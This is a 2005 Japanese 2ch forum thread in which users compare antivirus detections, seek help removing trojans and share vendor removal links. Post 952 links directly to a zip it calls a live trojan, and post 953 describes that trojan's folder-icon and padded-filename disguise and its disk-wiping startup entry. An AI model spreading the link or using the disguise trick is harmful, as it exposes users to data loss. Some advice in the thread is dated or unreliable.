ttp://www.symantec.com/region/jp/avcenter/venc/data/spyware.invisiblekey.html

【・NOD32は未対応】

907 名前:帆船8●1 mailto:sage [2005/07/09(土) 22:43:14 ]

   ノノノノ
  ( ゚∋゚)
 ̄∪| ̄∪| ̄| ⌒ヽ
 ̄| ̄ ̄| ̄ ̄|=゚ω゚) 
 ̄ ̄| ̄ ̄| ̄|⌒丶  
 ̄| ̄ ̄| ̄ ̄|从wノ   噂の「Vocal Cancel」ですが、
 ̄ ̄| ̄ ̄| ̄|Д`ノ <  閉鎖されたページがInternet Archiveで保存されており、
 ̄| ̄ ̄| ̄ ̄| /      そこからソフトが落とせましたので(zipファイルの解凍に修復が必要でした)
 ̄ ̄| ̄ ̄| ̄|・∀・)     二つのフリーのトロイ対策ソフトで調査しました。
^^^^^^^^^^^^^^^^^^^

結果は、

「ewido」(Ver3.5、データベース#1323)では「TROJ_HIROFU」として検出されました。
「a-squared」(Ver1.6、総定義数156308)では、マルウェア・トロイとして検出されませんでした。

908 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/10(日) 03:33:19 ]
マカフィーでスキャンかけたら一つウイルスを発見しました
トロイの木馬「Downloader-QR」というものなのですが、これはいったい・・・


909 名前:帆船8●1 mailto:sage [2005/07/10(日) 20:32:24 ]
>>908
   ノノノノ
  ( ゚∋゚)
 ̄∪| ̄∪| ̄| ⌒ヽ
 ̄| ̄ ̄| ̄ ̄|=゚ω゚) 
 ̄ ̄| ̄ ̄| ̄|⌒丶
 ̄| ̄ ̄| ̄ ̄|从wノ 悪い虫は早めに駆除ですよ 
 ̄ ̄| ̄ ̄| ̄|Д`ノつttp://www.nai.com/japan/security/virD2004.asp?v=Downloader-QR#removal
 ̄| ̄ ̄| ̄ ̄| /
 ̄ ̄| ̄ ̄| ̄|・∀・)
^^^^^^^^^^^^^^^^^^^

910 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/11(月) 01:55:41 ]
>907
VirusTotalでためしてくれ〜
ttp://www.virustotal.com/flash/index_en.html

911 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/11(月) 04:20:54 ]
>>910
907じゃないけど結果は以前試した時と同じだった
反応するのはSymantecとFortinetだけ



912 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/11(月) 16:41:04 ]
インシデント 状態 ロケーション
Adware:Adware/Ucmore 駆除不能 Windows レジストリ
Virus:Trj/Downloader.ABR 駆除 オペレーティングシステム
Spyware:Spyware/FastSearchWeb 駆除不能 Windows レジストリ
Virus:Trj/Downloader.AEE 駆除 オペレーティングシステム
Adware:Adware/Xrenoder 駆除不能 Windows レジストリ
Virus:Trj/Small.GV 駆除 オペレーティングシステム Adware:Adware/Pacimedia 駆除不能 Windows レジストリ

NOD32で検出かけた後、パンダフリーでこれだけ検出された
スパイウェアはSPYBOTとADARAEで検出されなかったのがでた
超ショック_| ̄|○NOD32・・・

913 名前:名無しさん@お腹いっぱい。 [2005/07/11(月) 21:20:10 ]
ESETをデフォルト設定で使ってるとスパイウェアは検出しないのでは?


914 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/11(月) 21:36:33 ]
ESET Tackles Spyware with NOD32 Version 2.5;
Receives Checkmark Certification

スパイウェア関係の検出力は高いみたいなのにね。
その前にESETのサイトに日本語版がないのは何故?


915 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/14(木) 10:45:54 ]
●米Webサイト“Download.com”で配布されていた「Daemon Tools」にウイルス混入●
ttp://www.forest.impress.co.jp/article/2005/07/14/dtoolsdlcom.html
※7月14日時点で対応しているアンチウイルス製品
Kaspersky
ttp://www.viruslist.com/en/alerts?alertid=166119889
ノートン
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.gregcenter.html
マカフィー
ttp://www.mcafeesecurity.com/japan/security/virG2004.asp?v=W32/GregCenter

【・NOD32は未対応】

916 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/14(木) 12:36:55 ]
Trojan
www.boardsmag.com/screeningroom/commercials/1794/


917 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/14(木) 15:58:58 ]
>>914
キャノンが怠慢だから

918 名前:名無しさん@お腹いっぱい。 [2005/07/15(金) 13:08:20 ]
>>915
>なお、窓の杜ではアーカイブをライブラリに掲載する際に、
>ウイルス対策ソフトを3本常駐させたパソコンでアーカイブのチェックを入念に行っている。

3本常駐って・・・そんなことできるのか?

919 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/15(金) 13:20:50 ]
>>918
そんなこと書いてあったのか。
仮に見た目問題が出ないとしても絶対にやらないよな。
窓の社ってアホの集まりだったんだなw

920 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/15(金) 16:39:11 ]
>>918
ノートンあたりと、BitDefenderとClamWinの組み合わせとかじゃないか。
BitとClamは、常駐保護機能はないけど、
うpだてとかのために常駐するプロセスがあるから、
>ウイルス対策ソフトを3本常駐させたパソコン
という表現は間違ってはいない。

921 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/15(金) 17:23:59 ]
>>920
情けないフォローの社員乙。



922 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/15(金) 17:30:52 ]
前に3つのソフトの名前が出てたけど、普通に常駐保護機能のある奴だったと思ったが。
それならむしろ、本体、VMware、VirtualPCにそれぞれインスコとか。

923 名前:922 mailto:sage [2005/07/15(金) 17:33:57 ]
# Norton AntiVirus 2005
# ウイルスバスター2005 インターネット セキュリティ
# NOD32アンチウイルス

だった。
ttp://www.forest.impress.co.jp/announce/20050606.html

924 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/15(金) 18:22:10 ]
うむ、常駐保護っつー言葉がおかしい気はするけど
体験版を仮想OSに入れて、本OSのダウソフォルダを仮想OSと共有するのは基本だとおも

925 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/15(金) 18:22:34 ]
常駐保護→常駐させた

926 名前:名無しさん@お腹いっぱい。 [2005/07/16(土) 16:12:24 ]
2ちゃんで踏んだんだけど、突然「Error#317 Security Warrning」とでるし
勝手にデスクトップにHotxというショートカットができて
それがけしてもけしても現れるんだだが  どうにもならない?

927 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/16(土) 16:16:24 ]
pc8.2ch.net/test/read.cgi/sec/1120529277/361

928 名前:名無しさん@お腹いっぱい。 [2005/07/16(土) 17:19:22 ]
>>927 しょうがないじゃん、誰も答えてくれないんだから


929 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/16(土) 17:28:05 ]
いいか、Googleをうまく使え

930 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/16(土) 18:39:07 ]
キンタマってHDD内にzip32.dllとかzip32j.dllがない場合には動作できないんですか?
Expolorerは使ってないので不要なdllはuncaldixで削除しているんですが。

931 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/16(土) 18:41:08 ]
tmp5.2ch.net/test/read.cgi/download/



932 名前:名無しさん@お腹いっぱい。 [2005/07/17(日) 11:02:20 ]
>>919
>窓の社ってアホの集まりだったんだなw

アホはおまいだw
社じゃねーよ杜だよ!

933 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/17(日) 15:10:08 ]
メモリにTROJ_Agent.DBが感染してるんだけど、ぐぐっても削除方法がわからない
誰か助けて(;つД`)

XP(sp2) NOD32

934 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/17(日) 15:23:09 ]
ttp://www.viruslist.com/en/viruses/encyclopedia?virusid=59077
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.conycspa.g@mm.html


935 名前:名無しさん@お腹いっぱい。 [2005/07/18(月) 23:38:46 ]
2005/07/18 23:26:33,スーパーバイザ,未使用 Windows サービス遮断 を検出して遮断しました。
××.××.×××.××× とのすべての通信は 2880 分間にわたって遮断されます。"

nisでこういう表示が一日1回は出るのですが
多すぎでしょうか?

936 名前:名無しさん@お腹いっぱい。 [2005/07/19(火) 06:56:09 ]
www.cybersyndrome.net/whois.html
ここでIPアドレスから相手の情報を探れるぞ。
出てくるのは外国ばっかだけどな。
取れた情報を元にファイアーウォールかけとけばいいと思う。

937 名前:936 [2005/07/19(火) 07:04:20 ]
サイトに飛ばなかった場合はそのURLを手打ちで。

938 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/19(火) 19:38:44 ]
>>933
NOD32対応してないか?
ttp://www.eset.com/support/info.htm

>NOD32 - v.1.1134 (20050608)
> Win32/TrojanDownloader.Zdesnado, Win32/TrojanDownloader.Zdesnado.T

>NOD32 - v.1.1007 (20050223)
>Win32/TrojanDownloader.Zdesnado.N

>NOD32 - v.1.1006 (20050222)
>Win32/TrojanDownloader.Zdesnado.F

939 名前:名無しさん@お腹いっぱい。 [2005/07/21(木) 22:39:26 ]
初心者です。
どうやらTROJ_SMALL.GOに感染したようです。
ネットも他のプログラムも使えない状態です。
(今は携帯から)
どうしたらよいでしょうか?
検索もできなくて…

940 名前:名無しさん@お腹いっぱい。 [2005/07/22(金) 02:04:28 ]
同じく初心者です。
PC立ち上げたら「JS/Exploit-HelpXSiteに感染してたから駆除した」
というメッセージが出たんですが、
駆除されたらもう大丈夫なんですかね?
mcafeeのHP見てもよくわからなかったもので・・・。
一応スキャンはしました。

教えて!エロい人。


941 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/22(金) 03:46:47 ]
前スレはよいスレだったんだけどなぁ・・・。
>>939
ウィルスやトロイは感染してしまったらもうおしまいと思った方がよいですよ。
それか、対処できるような知識を身に付けてください。
検出名がわかっているということは、情報はあるはずですからね。



942 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/22(金) 03:52:54 ]
>>940
あなたの場合、アンチウィルスソフトが防いでくれたようですが
必ず検出されたものはログファイルに記録されているはずです。
まずはその見方を覚えてください。

見る時に重要なことは、検出名とファイルの名前、それと検出された場所です。
駆除したという報告があるならば見つかった場所にはもう感染した
ファイルは無いはずです。それを確認できたら念のために
ハードディスク全体をスキャンします。それで何も検出されなければ
とりあえず安心しても良いでしょう。

943 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/22(金) 04:03:56 ]
なんで初歩的な事をいちいち教えてる訳?
はぁあぁぁああ

944 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/22(金) 20:35:19 ]
テンプレにもあるSwat It、フリーで常駐保護ありって聞いてインスコしてみたんだが

1 Scanタブで指定フォルダ内ファイルをスキャン
2 Processタブでプロセスの強制終了(実行ファイルのあるフォルダを開く等も可)
3 Updateタブで定義ファイルアップデート

までは分かったんだけど、これ常駐保護機能って具体的に何をしているんでしょ?
Settingsタブにもそれっぽい項目が何もないし、何か常駐保護されてる気がしないんだけど…

うーん、漏れが頭悪いだけだったら申し訳ない

945 名前:  mailto:sage [2005/07/24(日) 23:43:30 ]
>>944
Swat Itのフリー版は常駐保護はないよ

946 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/25(月) 15:30:14 ]
さっきノートンがコンピュータ上にトロイを発見したってでてきたんだけど
適用した処理がファイルを修復できませんってでてきた
これってまだ残ってるってことだよな?
誰か解決法教えてください
調べたりしていろいろやってみてるけど何度ウイルスチェックしても引っかからないし…

947 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/25(月) 16:23:57 ]
ログ見ないと分からないけど修復できないから、削除したんじゃない?
気になるなら、Antidote 辺りを使って、セーフモードでスキャンしてみるとか。

948 名前:946 mailto:sage [2005/07/25(月) 16:45:33 ]
そのあとOK押したらアクセスが拒否されましたともでてきたんで不安です…
Antidoteってのはフリーのはないんですか?落とせません


949 名前:946 mailto:sage [2005/07/25(月) 17:00:28 ]
Antidone落とせました、セーフモードでやってみます


950 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/26(火) 18:17:37 ]
なにげなくregprotいれてみたんだが、ことあるごとにpowerbarとかでる。しかも二つ。
これって何事?どう対処すれば

951 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/26(火) 18:37:34 ]
>>938
7月26日からWindows Server 2003がSP1へ自動更新されるようになりますがNOD32はSP1にまだ未対応。
SP1にアップデートすると通信不能となり最悪の場合OSがリブートの繰り返しとなるので注意。
canon-sol.jp/product/nd/nd_server2003.html



952 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 06:58:43 ]
某スレでの報告だが、モノホンのトロイのようだ
ttp://vladimir.ddo.jp:8888/cgi-bin/ane/src/ane1049.zip

ノートンすら反応しねえ…

953 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 06:59:45 ]
アイコンがフォルダーアイコンに偽装されてて
ファイル名が「かおる姫                   .exe」になってた。
スペース入れてファイル名が長かった為、ファイル名全部表示されずついWクリ。
もしくは拡張子表示してないのでWクリ。
実行すると「殺してやる!.exe」ってのがスタートアップフォルダーに追加され再起動の時点で実行される。
そんでもってHDD内あぼーん。

954 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 07:46:08 ]
>>952-953
アンチウィルスソフトに頼りきりのやつはとりあえず入れておけ。
フォルダ偽装なら馬鹿でも100%防げるようになるぞ。
ProcessGuard Free
www.diamondcs.com.au/processguard/index.php?page=download

一応専用スレ
ProcessGuard
pc8.2ch.net/test/read.cgi/sec/1118056531/

955 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 09:16:45 ]
ノートンすら反応しねえ…
ノートンすら反応しねえ…
ノートンすら反応しねえ…
ノートンすら反応しねえ…
ノートンすら反応しねえ…

ノートン(笑)だからだろw

956 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 09:26:09 ]
>>955
おすすめソフト教えて

957 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 12:31:41 ]
>>956
>>954
アンチウイルスに頼り切るなよ。
ノートンはヒューリスティックより、シグネチャに重きを置いてるソフトなんだから
新種のウイルスを検出しにくいのは当たり前だろ。

958 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 12:46:53 ]
変な事吹き込むなよ。アフォユーザ減ったら踏み台減っちゃうだろ^−^

959 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 19:15:12 ]
>>952
なんかAVGが反応したぞ

960 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 19:31:28 ]
まぁ、重きっつーかノートンのヒューリスティクはマジで酷すぎだけどな
NODが大喜びしてたランキング(URL忘れた)でフリーソフト以下だった記憶が・・・

961 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 19:40:32 ]
どこへ行ってもいる比較厨ほんとにうざっ!



962 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 20:45:54 ]
なんだ、ノートソ厨か?w
別に漏れも順位とかには興味ねーが、自分が使ってるソフトの弱点くらい知っておけよ。
ノートソじゃ定義ファイルにないウイルスはまず見つからん

963 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/28(木) 21:14:42 ]
溺れる者は藁をもつかむ

964 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/29(金) 23:55:13 ]
TDS-3が開発中止になったみたいですね。
フリー版を試してみたかったけど、ダウンロードできなくなってた。

965 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/08/09(火) 10:13:24 ]
ヒューリスティクだとABONEになるだろが!
用語は正しく使いましょう。

966 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/08/09(火) 12:12:09 ]
虹色キンタマ発生
tmp5.2ch.net/test/read.cgi/download/1122198484/
802 名前:通報屋 ◆Y39/vakKjY [sage] 投稿日:2005/08/09(火) 01:19:03 ID:D+6ug8Vx0
ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
ファイル名: C:\Virus\uporg165729\今月分ロリ詰め合わせ01.bin
結果: このファイルは次のウィルスに感染しています: Trojan Horse
デベロッパーノート
ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイルス、
ワームまたはトロイの木馬に感染していると判断いたしました。
今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしましたので、
このメールの末尾に書かれた手順にしたがってインストールしてください。
先生緊急対応。
Trendには連絡済み。

207 名前:番組の途中ですが名無しです [sage] 投稿日:2005/08/09(火) 10:07:29 ID:VF4CpZQu0
ご提出いただいたサンプルについて、シマンテック・セキュリティ・レスポンスはウイル
ス、ワームまたはトロイの木馬に感染していると判断いたしました。
今回の提出されたサンプルに含まれる脅威に個別対応した定義ファイルを作成いたしまし
たので、このメールの末尾に書かれた手順にしたがってインストールしてください。

個別対応した定義ファイルをダウンロードしてインストールする方法:
1. Web ブラウザを起動します。
2. この FTP サイト:
ftp://ftp.symantec.com/public/english_us_canada/antivirus_definitions/norton_antivirus/rapidrelease/symrapidreleasedefsi32.exe
へのリンクを
クリックしてください。

967 名前:名無しさん@お腹いっぱい。 [2005/08/29(月) 09:26:26 ]
トロイの木馬ってなんですか☆教えて下さい2chの屑ども

968 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/08/29(月) 10:02:24 ]
>>967
検索して出直せ。

969 名前:名無しさん@お腹いっぱい。 [2005/08/30(火) 14:22:36 ]
なんかギコナビのファイルにトロイがいたらしい。
しかもavastだから余計に不安なんだけど。

970 名前:名無しさん@お腹いっぱい。 [2005/08/30(火) 14:43:02 ]
>>969
ギコナビにトロイが仕込まれているのは
有名な話だが。

971 名前:名無しさん@お腹いっぱい。 [2005/08/30(火) 15:21:33 ]
>>970え?本当ですか?初めて聞きました…
なんかブラウザ特集のページからDLしたんですが。
ヤバイですよね?
どのような被害が考えられますか?



972 名前:名無しさん@お腹いっぱい。 [2005/08/30(火) 17:25:46 ]
>>971
ウイルスよりトロイの方がやっかい。
わかるだろ?
リカバリー汁。


973 名前:名無しさん@お腹いっぱい。 [2005/08/30(火) 18:56:34 ]
おりも気になってシマンテックで検索したら
VBS.LoveLetter.Aにやられてた。


974 名前:名無しさん@お腹いっぱい。 [2005/08/30(火) 21:43:34 ]
>>972一応削除したけど、リカバリかけた方が良いですかね?

975 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/08/30(火) 21:51:00 ]
>>974
俺はavast使ったことないからよく知らんが、ノートントラップみたいな誤検出じゃないのか?
頻繁に再起動するとか、異様に重いとか、FWのログに異常があるとか、そういう具体的な異常があるの?
無いのなら、誤検出の線で疑ったほうがいいと思う。
とりあえず、検出されたウイルス名と場所を、フルパスで書いてみ。

976 名前:名無しさん@お腹いっぱい。 mailto:age [2005/08/30(火) 22:00:28 ]
ADやスパボでは何も検出されなかったけど
ewido暇つぶしにインスコしたらトロイが金玉、失礼、
しこたま出てきた。
>>973と同じワームも検出されたw

977 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/08/30(火) 22:02:14 ]
ログの特定文字列を検出するノートントラップな訳だが

978 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/08/30(火) 22:10:18 ]
avast!のログファイル( .dat )誤検出例
Win32:Mhtplo-8[Trj]
Win32:Mhtplo-26[Trj]

979 名前:名無しさん@お腹いっぱい。 [2005/08/30(火) 22:37:47 ]
>>975ファイルは分かりません削除ログが見れなくて。

しかし、DL板の猫に小判なサイト掲載の怪しい英語サイトにアクセスした時にトロイの木馬をブロックしましたってウインドが出たから、
それから感染したのかな。
マジでリカバリしたが吉かな…

なんか潜伏するんですよね

980 名前:名無しさん@お腹いっぱい。 [2005/08/30(火) 22:38:53 ]
>>976
violet.homeip.net/upload/img-box/img20050829205112.jpg

981 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/08/30(火) 22:40:01 ]
>>979
潜在&形を変えての増殖
ヤヴァイよ。



982 名前:名無しさん@お腹いっぱい。 [2005/08/30(火) 22:46:51 ]
>>981安いし市販のウィルスセキュリティ2005EX買おうかなと思った矢先ですが、検疫率はavastより下なんだよな。

駆除も大変そうだから明日リカバリかけますわ〜

983 名前:名無しさん@お腹いっぱい。 [2005/08/31(水) 18:22:16 ]
>>982
デラックス ヤヴァス!




[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]
前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<243KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef